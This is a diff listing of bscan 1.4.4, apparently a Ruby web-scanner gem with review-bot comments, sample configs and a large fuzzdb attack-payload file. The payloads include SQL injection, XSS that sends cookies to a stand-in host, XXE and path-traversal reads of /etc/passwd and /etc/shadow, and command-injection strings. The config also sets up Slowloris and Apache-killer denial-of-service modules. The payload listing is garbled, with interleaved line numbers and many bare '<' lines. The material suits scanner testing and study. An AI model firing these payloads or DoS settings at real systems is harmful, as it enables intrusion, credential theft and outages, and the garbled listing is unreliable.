bscan 1.4.4
- data/CONFIG.rdoc +131 -0
- data/README.rdoc +140 -0
- data/Rakefile +54 -0
- data/VERSION +1 -0
- data/bin/bscan +79 -0
- data/bscan.gemspec +63 -0
- data/lib/bscan.rb +324 -0
- data/lib/bscan/modules/injector.rb +142 -0
- data/lib/bscan/modules/kill_apache.rb +201 -0
- data/lib/bscan/modules/many_threads.rb +52 -0
- data/lib/bscan/modules/slowloris.rb +263 -0
- data/lib/bscan/utils/bscan_helper.rb +133 -0
- data/release_notes.txt +25 -0
- data/samples/config/big_request.txt +12 -0
- data/samples/config/conf +58 -0
- data/samples/config/injector.txt +514 -0
- data/samples/config/request.txt +12 -0
- data/samples/headless-bscan.sh +3 -0
- data/test.sh +3 -0
- data/test/bscan_test.rb +4 -0
- metadata +91 -0
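--- a/data/lib/bscan/utils/bscan_helper.rb
+++ b/data/lib/bscan/utils/bscan_helper.rb
@@ -0,0 +1,133 @@
+module BscanHelper
+class Issue
+attr_accessor :issue_name
+attr_accessor :url
+attr_accessor :severity
+attr_accessor :confidence
+attr_accessor :issue_background
+attr_accessor :issue_detail
+attr_accessor :remediation_background
+attr_accessor :http_messages
+
+def initialize(n, u, sev, conf, req, rsp, id='', ib='', rb='')
+@issue_name,@url,@severity,@confidence,@issue_background,@issue_detail,@remediation_background,@http_messages=
+n,u,sev,conf,ib,id,rb,[Message.new(req,rsp)]
+end
+
+end
+
+class Message
+attr_accessor :req_str
+attr_accessor :rsp_str
+def initialize(req, rsp)
+@req_str,@rsp_str = req,rsp
+end
+end
+
+def prop nm
+@prop_pref + nm
+end
+
+def search_path
+path = []
+path << File.expand_path('.') << File.expand_path(File.join('.','lib')) << File.expand_path(File.join('~','.bscan')) << File.expand_path(File.join('etc','bscan')) << $:
+end
+
+def search_path_file file
+Pathname.new(file).absolute? ? [file] : search_path.map! {|p| File.join(p,file)}
+end
+
+def open_in_path file
+io = nil
+files = search_path_file(file)
+files.each do |p|
+io = File.open(p,"r") if File.file?(p)
+return io if io
+end
+raise "Can't find file in: #{files.join(':')}"
+end
+
+def set_len r
+mbody = r.match(/(\r?\n\r?\n)/)
+body_pos = mbody.end(0)
+r.sub!(/content-length\s*:\s*\d+/i, "Content-Length: "+(r.length-body_pos).to_s)
+end
+
+
+def do_scan msg, trg, inj
+@bscan.activity[0]=true
+@bscan.Log 2, "#{@mid}do_scan Scanning: #{trg}"
+# msg.url = trg
+path = $1 if trg =~ /\/\/[^\/]+(\/.*)/
+path = '/' if (not path) or (path.length < 1)
+req = msg.req_str.sub(/(GET|POST|)\s*(.+)\s*HTTP/, "\\1 #{path} HTTP")
+
+send_req req, msg.getProtocol, inj
+
+end
+
+def get_url_host_port req,proto
+host,port = $1.split(/\s*:\s*/,2) if req =~ /host\s*:\s*([^\s]+)\s*\r?\n/i
+if not port
+port = '80' if proto == 'http'
+port = '443' if proto == 'https'
+end
+path = $2 if req =~/(GET|POST|)\s+(.+)\s+HTTP/
+["#{proto}://#{host}:#{port}"+path,host,port.to_i]
+end
+
+def send_only req, proto, inj
+begin
+trg,host,port = get_url_host_port req,proto
+https = proto == "https" ? true : false
+start = Time.now
+@bscan.Log 2, "#{@mid}send_req make_req: '#{trg}' '#{host}' '#{port}'\n#{req}"
+rsp = @bscan.make_request(host, port, https, req)
+rt = Time.now - start
+return [rsp,rt,trg,host,port]
+rescue Exception => e
+@bscan.Log 0, "#{@mid}send_req Exception: #{e.message}"
+@bscan.Log 0, e.backtrace.join("\n")
+end
+end
+
+
+
+def send_req req, proto, inj
+rsp,rt,trg,host,port = send_only req, proto, inj
+https = proto == "https" ? true : false
+if not @bscan.modules_only
+@bscan.Log 2, "#{@mid}send_req do_passive: '#{trg}' '#{host}' '#{port}'\n#{req}\n#{rsp}"
+@bscan.do_passive_scan(host, port, https, req, rsp)
+end
+verify_response trg, req, rsp, inj, rt
+end
+
+def esc exp
+Regexp.escape exp
+end
+
+def verify_response u, req, rsp, inj, time
+
+@bscan.Log 2, "#{@mid}verify_response: #{u} #{inj} #{time} #{req} #{rsp}"
+
+st = $1 if rsp =~ /^\s*HTTP.*\s+(\d+)\s+/
+st ||= '0'
+st = st.to_i
+issue = nil
+if (st >= 500 and @config[prop('check_status')]=='true')
+issue = Issue.new "#{@mid.chop}: Unexpected Error", u, "Medium", "Retest", req, rsp
+end
+mt = @config[prop('check_rsp_max_time')]
+mt = mt.to_i if mt
+if (mt and mt > 0 and time > mt)
+issue = Issue.new "#{@mid.chop}: Long Response Time", u, "Medium", "Retest", req, rsp, "Response time is longer that #{mt}"
+end
+if (rsp =~ /#{esc(inj)}/ and @config[prop('check_replay')]=='true')
+issue = Issue.new "#{@mid.chop}: Possible XSS", u, "High", "Retest", req, rsp, "The following input has been replayed in a response #{inj}"
+end
+
+@bscan.write_issue_state issue if issue
+end
+
+end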
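Review bot: `verify_response` reuses one `issue` variable for its three checks, so when a single request trips more than one of them (a 5xx status plus a reflected payload, for instance) only the last finding, "Possible XSS", reaches `@bscan.write_issue_state` and the "Unexpected Error" one is silently dropped; collect them instead with `issues = []`, `issues << Issue.new ...` in each branch, and `issues.each { |i| @bscan.write_issue_state i }` at the end. In `send_only` the `rescue Exception` swallows everything including interrupts and then returns no tuple, so `send_req` carries on with `rt`, `trg`, `host` and `port` all nil, still calls `do_passive_scan`, and `verify_response` raises `NoMethodError` on `time > mt` as soon as `check_rsp_max_time` is configured — narrow it to `rescue StandardError` and add `return unless rt` after the destructuring in `send_req`. `set_len` derives Content-Length from `r.length`, which on a 1.9-style runtime is a character count, so a payload containing non-ASCII bytes yields a header that undercounts the body and a truncated (or desynchronised) request on the wire; `r.bytesize` is the safer value, and `mbody` is nil when the request has no blank line, which makes `mbody.end(0)` raise. `search_path` also appends `$:` as one nested element rather than splicing it in, so `File.join(p,file)` later collapses the whole load path into a single bogus entry, and `File.expand_path(File.join('etc','bscan'))` resolves relative to the working directory rather than `/etc/bscan`.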
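--- a/data/release_notes.txt
+++ b/data/release_notes.txt
@@ -0,0 +1,25 @@
+== 1.4.4
+* Added a module for apache killer (apache_killer.rb)
+* Changed logging to use Java IO (Ruby's IO caused Java exceptions)
+
+== 1.4.3
+* Added a module for Slowloris attacks (slowloris.rb)
+* Updated rdocs
+* Added test.sh for local testing (run it from the prj root)
+
+== 1.4.2
+* Changed docs a bit and git repo location: ssh://gryb_info@git.code.sf.net/p/b-scan/trunk
+
+== 1.4.1
+* Added an important '--help config' option
+
+== 1.4.0
+
+* A version is released!
+
+* headless-bscan.sh - headless launcher example
+* bscan - executable used by headless-bscan.sh
+* bscan.rb - BScan main class
+* injector.rb - external module that injects malicious patterns (e.g. form fuzzdb)
+to URL params and body
+* many_threads.rb - external module that rpeats a request from multiple threads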
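--- a/data/samples/config/big_request.txt
+++ b/data/samples/config/big_request.txt
@@ -0,0 +1,12 @@
+POST /?q=something HTTP/1.1^M
+Host: target.one.com:80^M
+Accept: */*^M
+Accept-Language: en^M
+User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; Win64; x64; Trident/5.0)^M
+Connection: close^M
+Referer: http://asol.selfip.com/p^M
+Content-Type: application/x-www-form-urlencoded^M
+Content-Length: 14^M
+Cookie: JSESSIONID=583A7E5D1FE791D694BBAA1ACC10EBB8^M
+^M
+foo=^^^null^^^10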
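Review bot: This sample request (big_request.txt, going by the diffstat order) ships a concrete `Cookie: JSESSIONID=583A7E5D1FE791D694BBAA1ACC10EBB8` and a `Referer: http://asol.selfip.com/p`, which read like values captured from a live session rather than placeholders; if they are, the gem is publishing a session token, and either way a neutral value such as `Cookie: JSESSIONID=REPLACE_ME` and `Referer: http://target.one.com/` keeps users from scanning under someone else's identity or leaking a third-party host in every request. The declared `Content-Length: 14` also does not match the 16-byte body `foo=^^^null^^^10`, and once `^^^` is substituted by a payload it cannot be right in any case; that is only harmless if the `set_len` helper is applied to every request before it is sent, which this diff does not let me confirm, so a comment saying the header is recomputed (or a correct value) would help.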
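--- a/data/samples/config/conf
+++ b/data/samples/config/conf
@@ -0,0 +1,58 @@
+# BScan settings
+bscan.inactivity_to=300
+bscan.issues=issues
+bscan.modules_only=true
+#bscan.modules=bscan/modules/injector.rb:one,bscan/modules/injector.rb:two,bscan/modules/injector.rb:three,bscan/modules/many_threads.rb
+bscan.modules=bscan/modules/slowloris.rb
+bscan.url=http://target.one.com/path/?param=val
+bscan.url=http://target.two.com/path/?param=val
+
+#KillApache settings
+bscan.kill_apache.hostport=target.one.com:443
+bscan.kill_apache.protocol=https
+bscan.kill_apache.threads=500
+bscan.kill_apache.response_time_factor=5
+bscan.kill_apache.req_per_thread=1
+bscan.kill_apache.read_timeout=10
+bscan.kill_apache.range_nbr=500
+bscan.kill_apache.static_request=true
+
+
+
+#Slowloris settings: port is mandatory in 'hostport' param
+bscan.slowloris.hostport=target.three.com:443
+bscan.slowloris.protocol=https
+bscan.slowloris.method=POST
+bscan.slowloris.threads=25
+bscan.slowloris.response_time_factor=5
+bscan.slowloris.sleep_time=200
+bscan.slowloris.con_nbr_per_thread=50
+bscan.slowloris.pack_per_con=10
+bscan.slowloris.static_request=true
+
+
+# Injector settings
+bscan.injector.one.file=samples/config/injector.txt
+bscan.injector.one.inject_to_body=true
+bscan.injector.one.check_rsp_max_time=1
+bscan.injector.one.check_status=true
+bscan.injector.one.check_replay=true
+bscan.injector.two.file=samples/config/injector.txt
+bscan.injector.two.rsp_max_time=2
+bscan.injector.three.file=samples/config/injector.txt
+bscan.injector.three.inject_to_body=true
+bscan.injector.three.inject_instead_of=^^^:samples/config/request.txt:http
+bscan.injector.three.static_request=true
+bscan.injector.three.check_replay=true
+
+# Many threads settings
+bscan.many_threads.request=samples/config/big_request.txt:http:^^^
+bscan.many_threads.threads=7
+bscan.injector.two.rsp_max_time=2
+bscan.many_threads.static_request=true
+
+# Burp settings
+scanner.testSQLinjectionboolean=true
+scanner.numthreads=10
+proxy.interceptrequests=false
+intruder.numattackthreads=10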
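Review bot: `bscan.injector.two.rsp_max_time=2` (line 41, and repeated as line 51 inside the many-threads block) uses a key that nothing in this commit reads — `verify_response` in bscan_helper.rb looks up `check_rsp_max_time`, the spelling injector one uses on line 37 — so injector two silently gets no response-time check; rename it to `bscan.injector.two.check_rsp_max_time=2` and delete the stray copy under "Many threads settings". The sample also runs `slowloris.rb` by default with 25 threads × 50 connections each, and `kill_apache` is configured for 500 threads against `target.one.com:443`; since both are denial-of-service modules, a comment above those blocks stating that they must only be pointed at hosts the operator is authorised to take down, and that `bscan.modules` should be switched back to the injector line for ordinary scanning, would be worth adding. I cannot tell from this diff whether the two `bscan.url=` lines accumulate or the second overrides the first; a one-line comment saying which would spare users a surprise.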
@@ -0,0 +1,514 @@
|
|
1
|
+
<xss_check>
|
2
|
+
# All injections below are taken from Google's fuzzdb: http://code.google.com/p/fuzzdb/
|
3
|
+
!
|
4
|
+
!'
|
5
|
+
!@#$%%^#$%#$@#$%$$@#$%^^**(()
|
6
|
+
!@#0%^#0##018387@#0^^**(()
|
7
|
+
"
|
8
|
+
" or "a"="a
|
9
|
+
" or "x"="x
|
10
|
+
" or 0=0 #
|
11
|
+
" or 0=0 --
|
12
|
+
" or 1=1 or ""="
|
13
|
+
" or 1=1--
|
14
|
+
"' or 1 --'"
|
15
|
+
") or ("a"="a
|
16
|
+
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////dev/random"">]><foo>&xxe;</foo>"
|
17
|
+
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM ""file:////etc/passwd"">]><foo>&xxe;</foo>"
|
18
|
+
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[' or 1=1 or ''=']]></foo>"
|
19
|
+
"<?xml version=""1.0"" encoding=""ISO-8859-1""?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>"
|
20
|
+
"<HTML xmlns:xss><?import namespace=""xss"" implementation=""http://ha.ckers.org/xss.htc""><xss:xss>XSS</xss:xss></HTML>"
|
21
|
+
"<xml ID=""xss""><I><B><IMG SRC=""javas<!-- -->cript:alert('XSS')""></B></I></xml><SPAN DATASRC=""#xss"" DATAFLD=""B"" DATAFORMATAS=""HTML""></SPAN></C></X></xml><SPAN DATASRC=#I DATAFLD=C DATAFORMATAS=HTML></SPAN>"
|
22
|
+
"<xml ID=I><X><C><![CDATA[<IMG SRC=""javas]]><![CDATA[cript:alert('XSS');"">]]>"
|
23
|
+
"><script>"
|
24
|
+
"><script>alert(1)</script>
|
25
|
+
"><script>document.location='http://your.site.com/cgi-bin/cookie.cgi?'+document.cookie</script>
|
26
|
+
">xxx<P>yyy
|
27
|
+
"\t"
|
28
|
+
#
|
29
|
+
#'
|
30
|
+
#'
|
31
|
+
#xA
|
32
|
+
#xA#xD
|
33
|
+
#xD
|
34
|
+
#xD#xA
|
35
|
+
$NULL
|
36
|
+
$null
|
37
|
+
%
|
38
|
+
%#0123456x%08x%x%s%p%d%n%o%u%c%h%l%q%j%z%Z%t%i%e%g%f%a%C%S%08x%%
|
39
|
+
%00
|
40
|
+
%00../../../../../../etc/passwd
|
41
|
+
%00../../../../../../etc/shadow
|
42
|
+
%00/
|
43
|
+
%00/etc/passwd%00
|
44
|
+
%01%02%03%04%0a%0d%0aADSF
|
45
|
+
%08x
|
46
|
+
%0A/usr/bin/id
|
47
|
+
%0A/usr/bin/id%0A
|
48
|
+
%0Aid
|
49
|
+
%0Aid%0A
|
50
|
+
%0a ping -i 30 127.0.0.1 %0a
|
51
|
+
%oa ping -n 30 127.0.0.1 %0a
|
52
|
+
%0a id %0a
|
53
|
+
%0aDATA%0afoo%0a%2e%0aMAIL+FROM:+<youremail>%0aRCPT+TO:+<youremail>%0aDATA%0aFrom:+<youremail>%0aTo:+<youremail>%0aSubject:+tst%0afoo%0a%2e%0a
|
54
|
+
%0d
|
55
|
+
%0d%0aDATA%0d%0afoo%0d%0a%2e%0d%0aMAIL+FROM:+<youremail>%0d%0aRCPT+TO:+<youremail>%0d%0aDATA%0d%0aFrom:+<youremail>%0d%0aTo:+<youremail>%0d%0aSubject:+test%0d%0afoo%0d%0a%2e%0d%0a
|
56
|
+
%0d%0aX-Injection-Header:%20AttackValue
|
57
|
+
%20
|
58
|
+
%20$(sleep%2050)
|
59
|
+
%20'sleep%2050'
|
60
|
+
%20d
|
61
|
+
%20n
|
62
|
+
%20s
|
63
|
+
%20x
|
64
|
+
%20|
|
65
|
+
%21
|
66
|
+
%22%3E%3Cscript%3Edocument%2Elocation%3D%27http%3A%2F%2Fyour%2Esite%2Ecom%2Fcgi%2Dbin%2Fcookie%2Ecgi%3F%27%20%2Bdocument%2Ecookie%3C%2Fscript%3E
|
67
|
+
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%255cboot.ini
|
68
|
+
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..% 25%5c..%25%5c..%00
|
69
|
+
%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
70
|
+
%2500
|
71
|
+
%250a
|
72
|
+
%26
|
73
|
+
%27%20or%201=1
|
74
|
+
%28
|
75
|
+
%29
|
76
|
+
%2A
|
77
|
+
%2A%28%7C%28mail%3D%2A%29%29
|
78
|
+
%2A%28%7C%28objectclass%3D%2A%29%29
|
79
|
+
%2A%7C
|
80
|
+
%2C
|
81
|
+
%2e%2e%2f
|
82
|
+
%3C
|
83
|
+
%3C%3F
|
84
|
+
%3Cscript%3Ealert(%22X%20SS%22);%3C/script%3E
|
85
|
+
%3cscript%3ealert("XSS");%3c/script%3e
|
86
|
+
%3cscript%3ealert(document.cookie);%3c%2fscript%3e
|
87
|
+
%5C
|
88
|
+
%5C/
|
89
|
+
%60
|
90
|
+
%7C
|
91
|
+
%7f
|
92
|
+
%99999999999s
|
93
|
+
%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A%A
|
94
|
+
%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E%E
|
95
|
+
%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F%F
|
96
|
+
%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G%G
|
97
|
+
%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X%X
|
98
|
+
%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a%a
|
99
|
+
%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d%d
|
100
|
+
%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e%e
|
101
|
+
%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f%f
|
102
|
+
%ff
|
103
|
+
%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g%g
|
104
|
+
%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i%i
|
105
|
+
%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o%o
|
106
|
+
%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p%p
|
107
|
+
%s%p%x%d
|
108
|
+
%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s%s
|
109
|
+
%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u%u
|
110
|
+
%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x%x
|
111
|
+
&
|
112
|
+
& id
|
113
|
+
& ping -i 30 127.0.0.1 &
|
114
|
+
& ping -n 30 127.0.0.1 &
|
115
|
+
<
|
116
|
+
<
|
117
|
+
<
|
118
|
+
<
|
119
|
+
<
|
120
|
+
<
|
121
|
+
<
|
122
|
+
<
|
123
|
+
<
|
124
|
+
<
|
125
|
+
|
126
|
+
|
127
|
+
|
128
|
+
|
129
|
+
<
|
130
|
+
<
|
131
|
+
<
|
132
|
+
<
|
133
|
+
<
|
134
|
+
<
|
135
|
+
<
|
136
|
+
<
|
137
|
+
<
|
138
|
+
<
|
139
|
+
<
|
140
|
+
<
|
141
|
+
<
|
142
|
+
<
|
143
|
+
<
|
144
|
+
<
|
145
|
+
<
|
146
|
+
<
|
147
|
+
<
|
148
|
+
<
|
149
|
+
<
|
150
|
+
<
|
151
|
+
<
|
152
|
+
<
|
153
|
+
<
|
154
|
+
<
|
155
|
+
<
|
156
|
+
<
|
157
|
+
<
|
158
|
+
<
|
159
|
+
<
|
160
|
+
<
|
161
|
+
<
|
162
|
+
<
|
163
|
+
<
|
164
|
+
<
|
165
|
+
<
|
166
|
+
<
|
167
|
+
<
|
168
|
+
<
|
169
|
+
<
|
170
|
+
<
|
171
|
+
<
|
172
|
+
<
|
173
|
+
<
|
174
|
+
<
|
175
|
+
<
|
176
|
+
<
|
177
|
+
<
|
178
|
+
<
|
179
|
+
<
|
180
|
+
<
|
181
|
+
'
|
182
|
+
'%20OR
|
183
|
+
&id
|
184
|
+
<
|
185
|
+
<
|
186
|
+
<!--#exec%20cmd="/bin/cat%20/etc/passwd"-->
|
187
|
+
<!--#exec%20cmd="/bin/cat%20/etc/shadow"-->
|
188
|
+
<!--#exec%20cmd="/usr/bin/id;-->
|
189
|
+
<>"'%;)(&+
|
190
|
+
<script>alert(document.cookie);<script>alert
|
191
|
+
<script>alert(document.cookie);</script>
|
192
|
+
";id"
|
193
|
+
'
|
194
|
+
' (select top 1
|
195
|
+
' --
|
196
|
+
' ;
|
197
|
+
' UNION ALL SELECT
|
198
|
+
' UNION SELECT
|
199
|
+
' or ''='
|
200
|
+
' or '1'='1
|
201
|
+
' or '1'='1'--
|
202
|
+
' or 'x'='x
|
203
|
+
' or (EXISTS)
|
204
|
+
' or 0=0 #
|
205
|
+
' or 0=0 --
|
206
|
+
' or 1 in (@@version)--
|
207
|
+
' or 1=1 or ''='
|
208
|
+
' or 1=1--
|
209
|
+
' or a=a--
|
210
|
+
' or uid like '%
|
211
|
+
' or uname like '%
|
212
|
+
' or user like '%
|
213
|
+
' or userid like '%
|
214
|
+
' or username like '%
|
215
|
+
'%20or%201=1
|
216
|
+
'%3CIFRAME%20SRC=javascript:alert(%2527XSS%2527)%3E%3C/IFRAME%3E
|
217
|
+
'';!--"<XSS>=&{()}
|
218
|
+
') or ('a'='a
|
219
|
+
'--
|
220
|
+
'; exec master..xp_cmdshell
|
221
|
+
'; exec xp_regread
|
222
|
+
'; waitfor delay '0:30:0'--
|
223
|
+
';alert(String.fromCharCode(88,83,83))//\';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//\";alert(String.fromCharCode(88,83,83))//></SCRIPT>!--<SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>=&{}
|
224
|
+
';shutdown--
|
225
|
+
'><script>alert(document.cookie);</script>
|
226
|
+
'><script>alert(document.cookie)</script>
|
227
|
+
'hi' or 'x'='x';
|
228
|
+
'or select *
|
229
|
+
'sqlattempt1
|
230
|
+
'||UTL_HTTP.REQUEST
|
231
|
+
'||Utl_Http.request('http://<yourservername>') from dual--
|
232
|
+
(
|
233
|
+
(')
|
234
|
+
(sqlattempt2)
|
235
|
+
)
|
236
|
+
))))))))))
|
237
|
+
*
|
238
|
+
*'
|
239
|
+
*'
|
240
|
+
*(|(mail=*))
|
241
|
+
*(|(objectclass=*))
|
242
|
+
*/*
|
243
|
+
*|
|
244
|
+
+
|
245
|
+
+%00
|
246
|
+
,@variable
|
247
|
+
-
|
248
|
+
--
|
249
|
+
--';
|
250
|
+
--sp_password
|
251
|
+
-1
|
252
|
+
-1.0
|
253
|
+
-2
|
254
|
+
-20
|
255
|
+
-268435455
|
256
|
+
..%%35%63
|
257
|
+
..%%35c
|
258
|
+
..%25%35%63
|
259
|
+
..%255c
|
260
|
+
..%5c
|
261
|
+
..%bg%qf
|
262
|
+
..%c0%af
|
263
|
+
..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../boot.ini
|
264
|
+
..%u2215
|
265
|
+
..%u2216
|
266
|
+
../
|
267
|
+
../../../../../../../../../../../../etc/hosts
|
268
|
+
../../../../../../../../../../../../etc/hosts%00
|
269
|
+
../../../../../../../../../../../../etc/passwd
|
270
|
+
../../../../../../../../../../../../etc/passwd%00
|
271
|
+
../../../../../../../../../../../../etc/shadow
|
272
|
+
../../../../../../../../../../../../etc/shadow%00
|
273
|
+
..\
|
274
|
+
..\..\..\..\..\..\..\..\..\..\etc\passwd
|
275
|
+
..\..\..\..\..\..\..\..\..\..\etc\passwd%00
|
276
|
+
..\..\..\..\..\..\..\..\..\..\etc\shadow
|
277
|
+
..\..\..\..\..\..\..\..\..\..\etc\shadow%00
|
278
|
+
.\\./.\\./.\\./.\\./.\\./.\\./etc/passwd
|
279
|
+
.\\./.\\./.\\./.\\./.\\./.\\./etc/shadow
|
280
|
+
/
|
281
|
+
/%00/
|
282
|
+
/%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%25%5c..%00
|
283
|
+
/%2A
|
284
|
+
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
|
285
|
+
/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/shadow
|
286
|
+
/'
|
287
|
+
/'
|
288
|
+
/,%ENV,/
|
289
|
+
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/passwd
|
290
|
+
/..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../..%c0%af../etc/shadow
|
291
|
+
/.../.../.../.../.../
|
292
|
+
/../../../../../../../../%2A
|
293
|
+
/../../../../../../../../../../../etc/passwd%00.html
|
294
|
+
/../../../../../../../../../../../etc/passwd%00.jpg
|
295
|
+
/../../../../../../../../../../etc/passwd
|
296
|
+
/../../../../../../../../../../etc/passwd^^
|
297
|
+
/../../../../../../../../../../etc/shadow
|
298
|
+
/../../../../../../../../../../etc/shadow^^
|
299
|
+
/../../../../../../../../bin/id|
|
300
|
+
/..\../..\../..\../..\../..\../..\../boot.ini
|
301
|
+
/..\../..\../..\../..\../..\../..\../etc/passwd
|
302
|
+
/..\../..\../..\../..\../..\../..\../etc/shadow
|
303
|
+
/./././././././././././etc/passwd
|
304
|
+
/./././././././././././etc/shadow
|
305
|
+
//
|
306
|
+
//*
|
307
|
+
/etc/passwd
|
308
|
+
/etc/shadow
|
309
|
+
/index.html|id|
|
310
|
+
0
|
311
|
+
0 or 1=1
|
312
|
+
00
|
313
|
+
0xfffffff
|
314
|
+
1
|
315
|
+
1 or 1 in (@@version)--
|
316
|
+
1 or 1=1--
|
317
|
+
1.0
|
318
|
+
1; waitfor delay '0:30:0'--
|
319
|
+
1;SELECT%20*
|
320
|
+
1||Utl_Http.request('http://<yourservername>') from dual--
|
321
|
+
2
|
322
|
+
2147483647
|
323
|
+
268435455
|
324
|
+
65536
|
325
|
+
:response.write 111111
|
326
|
+
;
|
327
|
+
; ping 127.0.0.1 ;
|
328
|
+
;/usr/bin/id\n
|
329
|
+
;echo 111111
|
330
|
+
;id
|
331
|
+
;id;
|
332
|
+
;id\n
|
333
|
+
;id|
|
334
|
+
;ls -la
|
335
|
+
;system('/usr/bin/id')
|
336
|
+
;system('cat%20/etc/passwd')
|
337
|
+
;system('id')
|
338
|
+
;|/usr/bin/id|
|
339
|
+
<
|
340
|
+
< script > < / script>
|
341
|
+
<!
|
342
|
+
<![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]>
|
343
|
+
<![CDATA[<script>var n=0;while(true){n++;}</script>]]>
|
344
|
+
</foo>
|
345
|
+
<<
|
346
|
+
<<<
|
347
|
+
<<script>alert("XSS");//<</script>
|
348
|
+
<>"'%;)(&+
|
349
|
+
<?
|
350
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////dev/random">]><foo>&xxe;</foo>
|
351
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/passwd">]><foo>&xxe;</foo>
|
352
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file:////etc/shadow">]><foo>&xxe;</foo>
|
353
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM "file://c:/boot.ini">]><foo>&xxe;</foo>
|
354
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[' or 1=1 or ''=']]></foo>
|
355
|
+
<?xml version="1.0" encoding="ISO-8859-1"?><foo><![CDATA[<]]>SCRIPT<![CDATA[>]]>alert('XSS');<![CDATA[<]]>/SCRIPT<![CDATA[>]]></foo>
|
356
|
+
